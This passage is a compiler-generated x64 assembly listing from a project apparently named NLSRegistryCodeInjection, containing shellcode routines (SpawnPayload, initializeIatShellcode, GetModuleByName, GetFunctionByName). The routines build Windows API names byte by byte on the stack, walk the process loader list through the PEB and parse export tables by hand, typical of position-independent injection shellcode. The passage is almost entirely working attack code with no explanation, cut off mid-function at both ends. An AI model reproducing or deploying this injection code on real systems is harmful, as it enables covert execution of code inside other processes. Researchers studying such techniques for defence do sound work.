dwCodePageID$[rsp] 99 | mov rax, QWORD PTR iat$[rsp] 100 | call QWORD PTR [rax] 101 | test eax, eax 102 | jne SHORT $LN4@SpawnPaylo 103 | ; Line 60 104 | jmp SHORT $LN1@SpawnPaylo 105 | $LN4@SpawnPaylo: 106 | ; Line 62 107 | mov ecx, DWORD PTR dwCodePageID$[rsp] 108 | mov rax, QWORD PTR iat$[rsp] 109 | call QWORD PTR [rax+16] 110 | test eax, eax 111 | jne SHORT $LN5@SpawnPaylo 112 | ; Line 63 113 | jmp SHORT $LN1@SpawnPaylo 114 | $LN5@SpawnPaylo: 115 | ; Line 65 116 | xor ecx, ecx 117 | mov rax, QWORD PTR iat$[rsp] 118 | call QWORD PTR [rax+32] 119 | $LN1@SpawnPaylo: 120 | ; Line 66 121 | add rsp, 56 ; 00000038H 122 | ret 0 123 | ?SpawnPayload@@YAXPEAKAEAUkernel32Iat@@@Z ENDP ; SpawnPayload 124 | _TEXT ENDS 125 | ; Function compile flags: /Odtp 126 | _TEXT SEGMENT 127 | set_console_cp_name$ = 32 128 | alloc_console_name$ = 48 129 | get_proc_name$ = 64 130 | get_console_window_name$ = 80 131 | set_console_output_cp_name$ = 104 132 | set_Thread_UI_language_Name$ = 128 133 | baseAddrKernel32$ = 152 134 | kernel32_dll_name$ = 160 135 | get_proc$ = 192 136 | iat$ = 224 137 | ?initializeIatShellcode@@YAIAEAUkernel32Iat@@@Z PROC ; initializeIatShellcode 138 | ; File C:\Users\USER\source\repos\NLSRegistryCodeInjection\ShellcodeInjection\ShellcodeInjection.cpp 139 | ; Line 7 140 | $LN10: 141 | mov QWORD PTR [rsp+8], rcx 142 | sub rsp, 216 ; 000000d8H 143 | ; Line 8 144 | mov eax, 107 ; 0000006bH 145 | mov WORD PTR kernel32_dll_name$[rsp], ax 146 | mov eax, 101 ; 00000065H 147 | mov WORD PTR kernel32_dll_name$[rsp+2], ax 148 | mov eax, 114 ; 00000072H 149 | mov WORD PTR kernel32_dll_name$[rsp+4], ax 150 | mov eax, 110 ; 0000006eH 151 | mov WORD PTR kernel32_dll_name$[rsp+6], ax 152 | mov eax, 101 ; 00000065H 153 | mov WORD PTR kernel32_dll_name$[rsp+8], ax 154 | mov eax, 108 ; 0000006cH 155 | mov WORD PTR kernel32_dll_name$[rsp+10], ax 156 | mov eax, 51 ; 00000033H 157 | mov WORD PTR kernel32_dll_name$[rsp+12], ax 158 | mov eax, 50 ; 00000032H 159 | mov WORD PTR kernel32_dll_name$[rsp+14], ax 160 | mov eax, 46 ; 0000002eH 161 | mov WORD PTR kernel32_dll_name$[rsp+16], ax 162 | mov eax, 100 ; 00000064H 163 | mov WORD PTR kernel32_dll_name$[rsp+18], ax 164 | mov eax, 108 ; 0000006cH 165 | mov WORD PTR kernel32_dll_name$[rsp+20], ax 166 | mov eax, 108 ; 0000006cH 167 | mov WORD PTR kernel32_dll_name$[rsp+22], ax 168 | xor eax, eax 169 | mov WORD PTR kernel32_dll_name$[rsp+24], ax 170 | ; Line 9 171 | lea rcx, QWORD PTR kernel32_dll_name$[rsp] 172 | call ?GetModuleByName@@YAPEAXPEA_W@Z ; GetModuleByName 173 | mov QWORD PTR baseAddrKernel32$[rsp], rax 174 | ; Line 10 175 | cmp QWORD PTR baseAddrKernel32$[rsp], 0 176 | jne SHORT $LN2@initialize 177 | ; Line 11 178 | mov eax, 1 179 | jmp $LN1@initialize 180 | $LN2@initialize: 181 | ; Line 13 182 | mov BYTE PTR get_proc_name$[rsp], 71 ; 00000047H 183 | mov BYTE PTR get_proc_name$[rsp+1], 101 ; 00000065H 184 | mov BYTE PTR get_proc_name$[rsp+2], 116 ; 00000074H 185 | mov BYTE PTR get_proc_name$[rsp+3], 80 ; 00000050H 186 | mov BYTE PTR get_proc_name$[rsp+4], 114 ; 00000072H 187 | mov BYTE PTR get_proc_name$[rsp+5], 111 ; 0000006fH 188 | mov BYTE PTR get_proc_name$[rsp+6], 99 ; 00000063H 189 | mov BYTE PTR get_proc_name$[rsp+7], 65 ; 00000041H 190 | mov BYTE PTR get_proc_name$[rsp+8], 100 ; 00000064H 191 | mov BYTE PTR get_proc_name$[rsp+9], 100 ; 00000064H 192 | mov BYTE PTR get_proc_name$[rsp+10], 114 ; 00000072H 193 | mov BYTE PTR get_proc_name$[rsp+11], 101 ; 00000065H 194 | mov BYTE PTR get_proc_name$[rsp+12], 115 ; 00000073H 195 | mov BYTE PTR get_proc_name$[rsp+13], 115 ; 00000073H 196 | mov BYTE PTR get_proc_name$[rsp+14], 0 197 | ; Line 14 198 | lea rdx, QWORD PTR get_proc_name$[rsp] 199 | mov rcx, QWORD PTR baseAddrKernel32$[rsp] 200 | call ?GetFunctionByName@@YAPEAXPEAXPEAD@Z ; GetFunctionByName 201 | mov QWORD PTR get_proc$[rsp], rax 202 | ; Line 15 203 | cmp QWORD PTR get_proc$[rsp], 0 204 | jne SHORT $LN3@initialize 205 | ; Line 16 206 | mov eax, 3 207 | jmp $LN1@initialize 208 | $LN3@initialize: 209 | ; Line 18 210 | mov rax, QWORD PTR iat$[rsp] 211 | mov rcx, QWORD PTR get_proc$[rsp] 212 | mov QWORD PTR [rax+40], rcx 213 | ; Line 20 214 | mov BYTE PTR get_console_window_name$[rsp], 71 ; 00000047H 215 | mov BYTE PTR get_console_window_name$[rsp+1], 101 ; 00000065H 216 | mov BYTE PTR get_console_window_name$[rsp+2], 116 ; 00000074H 217 | mov BYTE PTR get_console_window_name$[rsp+3], 67 ; 00000043H 218 | mov BYTE PTR get_console_window_name$[rsp+4], 111 ; 0000006fH 219 | mov BYTE PTR get_console_window_name$[rsp+5], 110 ; 0000006eH 220 | mov BYTE PTR get_console_window_name$[rsp+6], 115 ; 00000073H 221 | mov BYTE PTR get_console_window_name$[rsp+7], 111 ; 0000006fH 222 | mov BYTE PTR get_console_window_name$[rsp+8], 108 ; 0000006cH 223 | mov BYTE PTR get_console_window_name$[rsp+9], 101 ; 00000065H 224 | mov BYTE PTR get_console_window_name$[rsp+10], 87 ; 00000057H 225 | mov BYTE PTR get_console_window_name$[rsp+11], 105 ; 00000069H 226 | mov BYTE PTR get_console_window_name$[rsp+12], 110 ; 0000006eH 227 | mov BYTE PTR get_console_window_name$[rsp+13], 100 ; 00000064H 228 | mov BYTE PTR get_console_window_name$[rsp+14], 111 ; 0000006fH 229 | mov BYTE PTR get_console_window_name$[rsp+15], 119 ; 00000077H 230 | mov BYTE PTR get_console_window_name$[rsp+16], 0 231 | ; Line 21 232 | mov BYTE PTR alloc_console_name$[rsp], 65 ; 00000041H 233 | mov BYTE PTR alloc_console_name$[rsp+1], 108 ; 0000006cH 234 | mov BYTE PTR alloc_console_name$[rsp+2], 108 ; 0000006cH 235 | mov BYTE PTR alloc_console_name$[rsp+3], 111 ; 0000006fH 236 | mov BYTE PTR alloc_console_name$[rsp+4], 99 ; 00000063H 237 | mov BYTE PTR alloc_console_name$[rsp+5], 67 ; 00000043H 238 | mov BYTE PTR alloc_console_name$[rsp+6], 111 ; 0000006fH 239 | mov BYTE PTR alloc_console_name$[rsp+7], 110 ; 0000006eH 240 | mov BYTE PTR alloc_console_name$[rsp+8], 115 ; 00000073H 241 | mov BYTE PTR alloc_console_name$[rsp+9], 111 ; 0000006fH 242 | mov BYTE PTR alloc_console_name$[rsp+10], 108 ; 0000006cH 243 | mov BYTE PTR alloc_console_name$[rsp+11], 101 ; 00000065H 244 | mov BYTE PTR alloc_console_name$[rsp+12], 0 245 | ; Line 22 246 | mov BYTE PTR set_console_cp_name$[rsp], 83 ; 00000053H 247 | mov BYTE PTR set_console_cp_name$[rsp+1], 101 ; 00000065H 248 | mov BYTE PTR set_console_cp_name$[rsp+2], 116 ; 00000074H 249 | mov BYTE PTR set_console_cp_name$[rsp+3], 67 ; 00000043H 250 | mov BYTE PTR set_console_cp_name$[rsp+4], 111 ; 0000006fH 251 | mov BYTE PTR set_console_cp_name$[rsp+5], 110 ; 0000006eH 252 | mov BYTE PTR set_console_cp_name$[rsp+6], 115 ; 00000073H 253 | mov BYTE PTR set_console_cp_name$[rsp+7], 111 ; 0000006fH 254 | mov BYTE PTR set_console_cp_name$[rsp+8], 108 ; 0000006cH 255 | mov BYTE PTR set_console_cp_name$[rsp+9], 101 ; 00000065H 256 | mov BYTE PTR set_console_cp_name$[rsp+10], 67 ; 00000043H 257 | mov BYTE PTR set_console_cp_name$[rsp+11], 80 ; 00000050H 258 | mov BYTE PTR set_console_cp_name$[rsp+12], 0 259 | ; Line 23 260 | mov BYTE PTR set_console_output_cp_name$[rsp], 83 ; 00000053H 261 | mov BYTE PTR set_console_output_cp_name$[rsp+1], 101 ; 00000065H 262 | mov BYTE PTR set_console_output_cp_name$[rsp+2], 116 ; 00000074H 263 | mov BYTE PTR set_console_output_cp_name$[rsp+3], 67 ; 00000043H 264 | mov BYTE PTR set_console_output_cp_name$[rsp+4], 111 ; 0000006fH 265 | mov BYTE PTR set_console_output_cp_name$[rsp+5], 110 ; 0000006eH 266 | mov BYTE PTR set_console_output_cp_name$[rsp+6], 115 ; 00000073H 267 | mov BYTE PTR set_console_output_cp_name$[rsp+7], 111 ; 0000006fH 268 | mov BYTE PTR set_console_output_cp_name$[rsp+8], 108 ; 0000006cH 269 | mov BYTE PTR set_console_output_cp_name$[rsp+9], 101 ; 00000065H 270 | mov BYTE PTR set_console_output_cp_name$[rsp+10], 79 ; 0000004fH 271 | mov BYTE PTR set_console_output_cp_name$[rsp+11], 117 ; 00000075H 272 | mov BYTE PTR set_console_output_cp_name$[rsp+12], 116 ; 00000074H 273 | mov BYTE PTR set_console_output_cp_name$[rsp+13], 112 ; 00000070H 274 | mov BYTE PTR set_console_output_cp_name$[rsp+14], 117 ; 00000075H 275 | mov BYTE PTR set_console_output_cp_name$[rsp+15], 116 ; 00000074H 276 | mov BYTE PTR set_console_output_cp_name$[rsp+16], 67 ; 00000043H 277 | mov BYTE PTR set_console_output_cp_name$[rsp+17], 80 ; 00000050H 278 | mov BYTE PTR set_console_output_cp_name$[rsp+18], 0 279 | ; Line 24 280 | mov BYTE PTR set_Thread_UI_language_Name$[rsp], 83 ; 00000053H 281 | mov BYTE PTR set_Thread_UI_language_Name$[rsp+1], 101 ; 00000065H 282 | mov BYTE PTR set_Thread_UI_language_Name$[rsp+2], 116 ; 00000074H 283 | mov BYTE PTR set_Thread_UI_language_Name$[rsp+3], 84 ; 00000054H 284 | mov BYTE PTR set_Thread_UI_language_Name$[rsp+4], 104 ; 00000068H 285 | mov BYTE PTR set_Thread_UI_language_Name$[rsp+5], 114 ; 00000072H 286 | mov BYTE PTR set_Thread_UI_language_Name$[rsp+6], 101 ; 00000065H 287 | mov BYTE PTR set_Thread_UI_language_Name$[rsp+7], 97 ; 00000061H 288 | mov BYTE PTR set_Thread_UI_language_Name$[rsp+8], 100 ; 00000064H 289 | mov BYTE PTR set_Thread_UI_language_Name$[rsp+9], 85 ; 00000055H 290 | mov BYTE PTR set_Thread_UI_language_Name$[rsp+10], 73 ; 00000049H 291 | mov BYTE PTR set_Thread_UI_language_Name$[rsp+11], 76 ; 0000004cH 292 | mov BYTE PTR set_Thread_UI_language_Name$[rsp+12], 97 ; 00000061H 293 | mov BYTE PTR set_Thread_UI_language_Name$[rsp+13], 110 ; 0000006eH 294 | mov BYTE PTR set_Thread_UI_language_Name$[rsp+14], 103 ; 00000067H 295 | mov BYTE PTR set_Thread_UI_language_Name$[rsp+15], 117 ; 00000075H 296 | mov BYTE PTR set_Thread_UI_language_Name$[rsp+16], 97 ; 00000061H 297 | mov BYTE PTR set_Thread_UI_language_Name$[rsp+17], 103 ; 00000067H 298 | mov BYTE PTR set_Thread_UI_language_Name$[rsp+18], 101 ; 00000065H 299 | mov BYTE PTR set_Thread_UI_language_Name$[rsp+19], 0 300 | ; Line 26 301 | lea rdx, QWORD PTR set_console_output_cp_name$[rsp] 302 | mov rcx, QWORD PTR baseAddrKernel32$[rsp] 303 | mov rax, QWORD PTR iat$[rsp] 304 | call QWORD PTR [rax+40] 305 | mov rcx, QWORD PTR iat$[rsp] 306 | mov QWORD PTR [rcx], rax 307 | ; Line 27 308 | mov rax, QWORD PTR iat$[rsp] 309 | cmp QWORD PTR [rax], 0 310 | jne SHORT $LN4@initialize 311 | ; Line 28 312 | mov eax, 4 313 | jmp $LN1@initialize 314 | $LN4@initialize: 315 | ; Line 30 316 | lea rdx, QWORD PTR get_console_window_name$[rsp] 317 | mov rcx, QWORD PTR baseAddrKernel32$[rsp] 318 | mov rax, QWORD PTR iat$[rsp] 319 | call QWORD PTR [rax+40] 320 | mov rcx, QWORD PTR iat$[rsp] 321 | mov QWORD PTR [rcx+8], rax 322 | ; Line 31 323 | mov rax, QWORD PTR iat$[rsp] 324 | cmp QWORD PTR [rax+8], 0 325 | jne SHORT $LN5@initialize 326 | ; Line 32 327 | mov eax, 5 328 | jmp $LN1@initialize 329 | $LN5@initialize: 330 | ; Line 34 331 | lea rdx, QWORD PTR set_console_cp_name$[rsp] 332 | mov rcx, QWORD PTR baseAddrKernel32$[rsp] 333 | mov rax, QWORD PTR iat$[rsp] 334 | call QWORD PTR [rax+40] 335 | mov rcx, QWORD PTR iat$[rsp] 336 | mov QWORD PTR [rcx+16], rax 337 | ; Line 35 338 | mov rax, QWORD PTR iat$[rsp] 339 | cmp QWORD PTR [rax+16], 0 340 | jne SHORT $LN6@initialize 341 | ; Line 36 342 | mov eax, 6 343 | jmp SHORT $LN1@initialize 344 | $LN6@initialize: 345 | ; Line 38 346 | lea rdx, QWORD PTR alloc_console_name$[rsp] 347 | mov rcx, QWORD PTR baseAddrKernel32$[rsp] 348 | mov rax, QWORD PTR iat$[rsp] 349 | call QWORD PTR [rax+40] 350 | mov rcx, QWORD PTR iat$[rsp] 351 | mov QWORD PTR [rcx+24], rax 352 | ; Line 39 353 | mov rax, QWORD PTR iat$[rsp] 354 | cmp QWORD PTR [rax+24], 0 355 | jne SHORT $LN7@initialize 356 | ; Line 40 357 | mov eax, 7 358 | jmp SHORT $LN1@initialize 359 | $LN7@initialize: 360 | ; Line 42 361 | lea rdx, QWORD PTR set_Thread_UI_language_Name$[rsp] 362 | mov rcx, QWORD PTR baseAddrKernel32$[rsp] 363 | mov rax, QWORD PTR iat$[rsp] 364 | call QWORD PTR [rax+40] 365 | mov rcx, QWORD PTR iat$[rsp] 366 | mov QWORD PTR [rcx+32], rax 367 | ; Line 43 368 | mov rax, QWORD PTR iat$[rsp] 369 | cmp QWORD PTR [rax+32], 0 370 | jne SHORT $LN8@initialize 371 | ; Line 44 372 | mov eax, 8 373 | jmp SHORT $LN1@initialize 374 | $LN8@initialize: 375 | ; Line 46 376 | xor eax, eax 377 | $LN1@initialize: 378 | ; Line 47 379 | add rsp, 216 ; 000000d8H 380 | ret 0 381 | ?initializeIatShellcode@@YAIAEAUkernel32Iat@@@Z ENDP ; initializeIatShellcode 382 | _TEXT ENDS 383 | ; Function compile flags: /Odtp 384 | ; COMDAT ?GetFunctionByName@@YAPEAXPEAXPEAD@Z 385 | _TEXT SEGMENT 386 | k$1 = 0 387 | i$2 = 8 388 | exp$ = 16 389 | expAddr$ = 24 390 | funcNamesListRVA$ = 28 391 | namesOrdsListRVA$ = 32 392 | funcsListRVA$ = 36 393 | curr_name$3 = 40 394 | idh$ = 48 395 | exportsDir$ = 56 396 | nt_headers$ = 64 397 | namesCount$ = 72 398 | nameIndex$4 = 80 399 | nameRVA$5 = 88 400 | funcRVA$6 = 96 401 | module$ = 128 402 | func_name$ = 136 403 | ?GetFunctionByName@@YAPEAXPEAXPEAD@Z PROC ; GetFunctionByName, COMDAT 404 | ; File C:\Users\USER\source\repos\NLSRegistryCodeInjection\ShellcodeInjection\defs.h 405 | ; Line 68 406 | $LN13: 407 | mov QWORD PTR [rsp+16], rdx 408 | mov QWORD PTR [rsp+8], rcx 409 | sub rsp, 120 ; 00000078H 410 | ; Line 69 411 | mov rax, QWORD PTR module$[rsp] 412 | mov QWORD PTR idh$[rsp], rax 413 | ; Line 70 414 | mov rax, QWORD PTR idh$[rsp] 415 | movzx eax, WORD PTR [rax] 416 | cmp eax, 23117 ; 00005a4dH 417 | je SHORT $LN8@GetFunctio 418 | ; Line 71 419 | xor eax, eax 420 | jmp $LN1@GetFunctio 421 | $LN8@GetFunctio: 422 | ; Line 73 423 | mov rax, QWORD PTR idh$[rsp] 424 | movsxd rax, DWORD PTR [rax+60] 425 | mov rcx, QWORD PTR module$[rsp] 426 | add rcx, rax 427 | mov rax, rcx 428 | mov QWORD PTR nt_headers$[rsp], rax 429 | ; Line 74 430 | mov eax, 8 431 | imul rax, rax, 0 432 | mov rcx, QWORD PTR nt_headers$[rsp] 433 | lea rax, QWORD PTR [rcx+rax+136] 434 | mov QWORD PTR exportsDir$[rsp], rax 435 | ; Line 75 436 | mov rax, QWORD PTR exportsDir$[rsp] 437 | cmp DWORD PTR [rax], 0 438 | jne SHORT $LN9@GetFunctio 439 | ; Line 76 440 | xor eax, eax 441 | jmp $LN1@GetFunctio 442 | $LN9@GetFunctio: 443 | ; Line 79 444 | mov rax, QWORD PTR exportsDir$[rsp] 445 | mov eax, DWORD PTR [rax] 446 | mov DWORD PTR expAddr$[rsp], eax 447 | ; Line 80 448 | mov eax, DWORD PTR expAddr$[rsp] 449 | add rax, QWORD PTR module$[rsp] 450 | mov QWORD PTR exp$[rsp], rax 451 | ; Line 81 452 | mov rax, QWORD PTR exp$[rsp] 453 | mov eax, DWORD PTR [rax+24] 454 | mov QWORD PTR namesCount$[rsp], rax 455 | ; Line 83 456 | mov rax, QWORD PTR exp$[rsp] 457 | mov eax, DWORD PTR [rax+28] 458 | mov DWORD PTR funcsListRVA$[rsp], eax 459 | ; Line 84 460 | mov rax, QWORD PTR exp$[rsp] 461 | mov eax, DWORD PTR [rax+32] 462 | mov DWORD PTR funcNamesListRVA$[rsp], eax 463 | ; Line 85 464 | mov rax, QWORD PTR exp$[rsp] 465 | mov eax, DWORD PTR [rax+36] 466 | mov DWORD PTR namesOrdsListRVA$[rsp], eax 467 | ; Line 88 468 | mov QWORD PTR i$2[rsp], 0 469 | jmp SHORT $LN4@GetFunctio 470 | $LN2@GetFunctio: 471 | mov rax, QWORD PTR i$2[rsp] 472 | inc rax 473 | mov QWORD PTR i$2[rsp], rax 474 | $LN4@GetFunctio: 475 | mov rax, QWORD PTR namesCount$[rsp] 476 | cmp QWORD PTR i$2[rsp], rax 477 | jae $LN3@GetFunctio 478 | ; Line 89 479 | mov eax, DWORD PTR funcNamesListRVA$[rsp] 480 | mov rcx, QWORD PTR module$[rsp] 481 | add rcx, rax 482 | mov rax, rcx 483 | mov rcx, QWORD PTR i$2[rsp] 484 | lea rax, QWORD PTR [rax+rcx*4] 485 | mov QWORD PTR nameRVA$5[rsp], rax 486 | ; Line 90 487 | mov eax, DWORD PTR namesOrdsListRVA$[rsp] 488 | mov rcx, QWORD PTR module$[rsp] 489 | add rcx, rax 490 | mov rax, rcx 491 | mov rcx, QWORD PTR i$2[rsp] 492 | lea rax, QWORD PTR [rax+rcx*2] 493 | mov QWORD PTR nameIndex$4[rsp], rax 494 | ; Line 91 495 | mov eax, DWORD PTR funcsListRVA$[rsp] 496 | mov rcx, QWORD PTR module$[rsp] 497 | add rcx, rax 498 | mov rax, rcx 499 | mov rcx, QWORD PTR nameIndex$4[rsp] 500 | movzx ecx, WORD PTR [rcx] 501 | lea rax, QWORD PTR [rax+rcx*4] 502 | mov QWORD PTR funcRVA$6[rsp], rax 503 | ; Line 93 504 | mov rax, QWORD PTR nameRVA$5[rsp] 505 | mov eax, DWORD PTR [rax] 506 | mov rcx, QWORD PTR module$[rsp] 507 | add rcx, rax 508 | mov rax, rcx 509 | mov QWORD PTR curr_name$3[rsp], rax 510 | ; Line 95 511 | mov QWORD PTR k$1[rsp], 0 512 | jmp SHORT $LN7@GetFunctio 513 | $LN5@GetFunctio: 514 | mov rax, QWORD PTR k$1[rsp] 515 | inc rax 516 | mov QWORD PTR k$1[rsp], rax 517 | $LN7@GetFunctio: 518 | mov rax, QWORD PTR k$1[rsp] 519 | mov rcx, QWORD PTR func_name$[rsp] 520 | add rcx, rax 521 | mov rax, rcx 522 | movsx eax, BYTE PTR [rax] 523 | test eax, eax 524 | je SHORT $LN6@GetFunctio 525 | mov rax, QWORD PTR k$1[rsp] 526 | mov rcx, QWORD PTR curr_name$3[rsp] 527 | add rcx, rax 528 | mov rax, rcx 529 | movsx eax, BYTE PTR [rax] 530 | test eax, eax 531 | je SHORT $LN6@GetFunctio 532 | ; Line 96 533 | mov rax, QWORD PTR k$1[rsp] 534 | mov rcx, QWORD PTR func_name$[rsp] 535 | add rcx, rax 536 | mov rax, rcx 537 | movsx eax, BYTE PTR [rax] 538 | mov rcx, QWORD PTR k$1[rsp] 539 | mov rdx, QWORD PTR curr_name$3[rsp] 540 | add rdx, rcx 541 | mov rcx, rdx 542 | movsx ecx, BYTE PTR [rcx] 543 | cmp eax, ecx 544 | je SHORT $LN10@GetFunctio 545 | jmp SHORT $LN6@GetFunctio 546 | $LN10@GetFunctio: 547 | ; Line 97 548 | jmp SHORT $LN5@GetFunctio 549 | $LN6@GetFunctio: 550 | ; Line 98 551 | mov rax, QWORD PTR k$1[rsp] 552 | mov rcx, QWORD PTR func_name$[rsp] 553 | add rcx, rax 554 | mov rax, rcx 555 | movsx eax, BYTE PTR [rax] 556 | test eax, eax 557 | jne SHORT $LN11@GetFunctio 558 | mov rax, QWORD PTR k$1[rsp] 559 | mov rcx, QWORD PTR curr_name$3[rsp] 560 | add rcx, rax 561 | mov rax, rcx 562 | movsx eax, BYTE PTR [rax] 563 | test eax, eax 564 | jne SHORT $LN11@GetFunctio 565 | ; Line 100 566 | mov rax, QWORD PTR funcRVA$6[rsp] 567 | mov eax, DWORD PTR [rax] 568 | mov rcx, QWORD PTR module$[rsp] 569 | add rcx, rax 570 | mov rax, rcx 571 | jmp SHORT $LN1@GetFunctio 572 | $LN11@GetFunctio: 573 | ; Line 102 574 | jmp $LN2@GetFunctio 575 | $LN3@GetFunctio: 576 | ; Line 103 577 | xor eax, eax 578 | $LN1@GetFunctio: 579 | ; Line 104 580 | add rsp, 120 ; 00000078H 581 | ret 0 582 | ?GetFunctionByName@@YAPEAXPEAXPEAD@Z ENDP ; GetFunctionByName 583 | _TEXT ENDS 584 | ; Function compile flags: /Odtp 585 | ; COMDAT ?GetModuleByName@@YAPEAXPEA_W@Z 586 | _TEXT SEGMENT 587 | i$1 = 0 588 | tv141 = 8 589 | tv160 = 10 590 | curr_name$2 = 16 591 | c1$3 = 24 592 | c2$4 = 28 593 | tv137 = 32 594 | tv156 = 36 595 | entry$5 = 40 596 | current$6 = 48 597 | head$ = 56 598 | peb$ = 64 599 | ldr$ = 72 600 | module_name$ = 96 601 | ?GetModuleByName@@YAPEAXPEA_W@Z PROC ; GetModuleByName, COMDAT 602 | ; File C:\Users\USER\source\repos\NLSRegistryCodeInjection\ShellcodeInjection\defs.h 603 | ; Line 30 604 | $LN20: 605 | mov QWORD PTR [rsp+8], rcx 606 | sub rsp, 88 ; 00000058H 607 | ; Line 33 608 | mov rax, QWORD PTR gs:[96] 609 | mov QWORD PTR peb$[rsp], rax 610 | ; Line 37 611 | mov rax, QWORD PTR peb$[rsp] 612 | mov rax, QWORD PTR [rax+24] 613 | mov QWORD PTR ldr$[rsp], rax 614 | ; Line 39 615 | mov rax, QWORD PTR ldr$[rsp] 616 | add rax, 32 ; 00000020H 617 | mov QWORD PTR head$[rsp], rax 618 | ; Line 40 619 | mov rax, QWORD PTR head$[rsp] 620 | mov rax, QWORD PTR [rax] 621 | mov QWORD PTR current$6[rsp], rax 622 | jmp SHORT $LN4@GetModuleB 623 | $LN2@GetModuleB: 624 | mov rax, QWORD PTR current$6[rsp] 625 | mov rax, QWORD PTR [rax] 626 | mov QWORD PTR current$6[rsp], rax 627 | $LN4@GetModuleB: 628 | mov rax, QWORD PTR head$[rsp] 629 | cmp QWORD PTR current$6[rsp], rax 630 | je $LN3@GetModuleB 631 | ; Line 41 632 | mov rax, QWORD PTR current$6[rsp] 633 | sub rax, 16 634 | mov QWORD PTR entry$5[rsp], rax 635 | ; Line 42 636 | cmp QWORD PTR entry$5[rsp], 0 637 | je SHORT $LN9@GetModuleB 638 | mov rax, QWORD PTR entry$5[rsp] 639 | cmp QWORD PTR [rax+48], 0 640 | jne SHORT $LN8@GetModuleB 641 | $LN9@GetModuleB: 642 | jmp $LN3@GetModuleB 643 | $LN8@GetModuleB: 644 | ; Line 44 645 | mov rax, QWORD PTR entry$5[rsp] 646 | mov rax, QWORD PTR [rax+96] 647 | mov QWORD PTR curr_name$2[rsp], rax 648 | ; Line 45 649 | cmp QWORD PTR curr_name$2[rsp], 0 650 | jne SHORT $LN10@GetModuleB 651 | jmp SHORT $LN2@GetModuleB 652 | $LN10@GetModuleB: 653 | ; Line 48 654 | mov QWORD PTR i$1[rsp], 0 655 | jmp SHORT $LN7@GetModuleB 656 | $LN5@GetModuleB: 657 | mov rax, QWORD PTR i$1[rsp] 658 | inc rax 659 | mov QWORD PTR i$1[rsp], rax 660 | $LN7@GetModuleB: 661 | mov rax, QWORD PTR entry$5[rsp] 662 | movzx eax, WORD PTR [rax+88] 663 | cmp QWORD PTR i$1[rsp], rax 664 | jae $LN6@GetModuleB 665 | ; Line 50 666 | mov rax, QWORD PTR module_name$[rsp] 667 | mov rcx, QWORD PTR i$1[rsp] 668 | movzx eax, WORD PTR [rax+rcx*2] 669 | test eax, eax 670 | je SHORT $LN12@GetModuleB 671 | mov rax, QWORD PTR curr_name$2[rsp] 672 | mov rcx, QWORD PTR i$1[rsp] 673 | movzx eax, WORD PTR [rax+rcx*2] 674 | test eax, eax 675 | jne SHORT $LN11@GetModuleB 676 | $LN12@GetModuleB: 677 | ; Line 51 678 | jmp $LN6@GetModuleB 679 | $LN11@GetModuleB: 680 | ; Line 54 681 | mov rax, QWORD PTR module_name$[rsp] 682 | mov rcx, QWORD PTR i$1[rsp] 683 | movzx eax, WORD PTR [rax+rcx*2] 684 | cmp eax, 90 ; 0000005aH 685 | jg SHORT $LN16@GetModuleB 686 | mov rax, QWORD PTR module_name$[rsp] 687 | mov rcx, QWORD PTR i$1[rsp] 688 | movzx eax, WORD PTR [rax+rcx*2] 689 | cmp eax, 65 ; 00000041H 690 | jl SHORT $LN16@GetModuleB 691 | mov rax, QWORD PTR module_name$[rsp] 692 | mov rcx, QWORD PTR i$1[rsp] 693 | movzx eax, WORD PTR [rax+rcx*2] 694 | sub eax, 65 ; 00000041H 695 | add eax, 97 ; 00000061H 696 | mov DWORD PTR tv137[rsp], eax 697 | mov rax, QWORD PTR module_name$[rsp] 698 | mov rcx, QWORD PTR i$1[rsp] 699 | movzx edx, WORD PTR tv137[rsp] 700 | mov WORD PTR [rax+rcx*2], dx 701 | movzx eax, WORD PTR tv137[rsp] 702 | mov WORD PTR tv141[rsp], ax 703 | jmp SHORT $LN17@GetModuleB 704 | $LN16@GetModuleB: 705 | mov rax, QWORD PTR module_name$[rsp] 706 | mov rcx, QWORD PTR i$1[rsp] 707 | movzx eax, WORD PTR [rax+rcx*2] 708 | mov WORD PTR tv141[rsp], ax 709 | $LN17@GetModuleB: 710 | movzx eax, WORD PTR tv141[rsp] 711 | mov WORD PTR c1$3[rsp], ax 712 | ; Line 55 713 | mov rax, QWORD PTR curr_name$2[rsp] 714 | mov rcx, QWORD PTR i$1[rsp] 715 | movzx eax, WORD PTR [rax+rcx*2] 716 | cmp eax, 90 ; 0000005aH 717 | jg SHORT $LN18@GetModuleB 718 | mov rax, QWORD PTR curr_name$2[rsp] 719 | mov rcx, QWORD PTR i$1[rsp] 720 | movzx eax, WORD PTR [rax+rcx*2] 721 | cmp eax, 65 ; 00000041H 722 | jl SHORT $LN18@GetModuleB 723 | mov rax, QWORD PTR curr_name$2[rsp] 724 | mov rcx, QWORD PTR i$1[rsp] 725 | movzx eax, WORD PTR [rax+rcx*2] 726 | sub eax, 65 ; 00000041H 727 | add eax, 97 ; 00000061H 728 | mov DWORD PTR tv156[rsp], eax 729 | mov rax, QWORD PTR curr_name$2[rsp] 730 | mov rcx, QWORD PTR i$1[rsp] 731 | movzx edx, WORD PTR tv156[rsp] 732 | mov WORD PTR [rax+rcx*2], dx 733 | movzx eax, WORD PTR tv156[rsp] 734 | mov WORD PTR tv160[rsp], ax 735 | jmp SHORT $LN19@GetModuleB 736 | $LN18@GetModuleB: 737 | mov rax, QWORD PTR curr_name$2[rsp] 738 | mov rcx, QWORD PTR i$1[rsp] 739 | movzx eax, WORD PTR [rax+rcx*2] 740 | mov WORD PTR tv160[rsp], ax 741 | $LN19@GetModuleB: 742 | movzx eax, WORD PTR tv160[rsp] 743 | mov WORD PTR c2$4[rsp], ax 744 | ; Line 56 745 | movzx eax, WORD PTR c1$3[rsp] 746 | movzx ecx, WORD PTR c2$4[rsp] 747 | cmp eax, ecx 748 | je SHORT $LN13@GetModuleB 749 | jmp SHORT $LN6@GetModuleB 750 | $LN13@GetModuleB: 751 | ; Line 57 752 | jmp $LN5@GetModuleB 753 | $LN6@GetModuleB: 754 | ; Line 59 755 | mov rax, QWORD PTR module_name$[rsp] 756 | mov rcx, QWORD PTR i$1[rsp] 757 | movzx eax, WORD PTR [rax+rcx*2] 758 | test eax, eax 759 | jne SHORT $LN14@GetModuleB 760 | mov rax, QWORD PTR curr_name$2[rsp] 761 | mov rcx, QWORD PTR i$1[rsp] 762 | movzx eax, WORD PTR [rax+rcx*2] 763 | test eax, eax 764 | jne SHORT $LN14@GetModuleB 765 | ; Line 60 766 | mov rax, QWORD PTR entry$5[rsp] 767 | mov rax, QWORD PTR [rax+48] 768 | jmp SHORT $LN1@GetModuleB 769 | 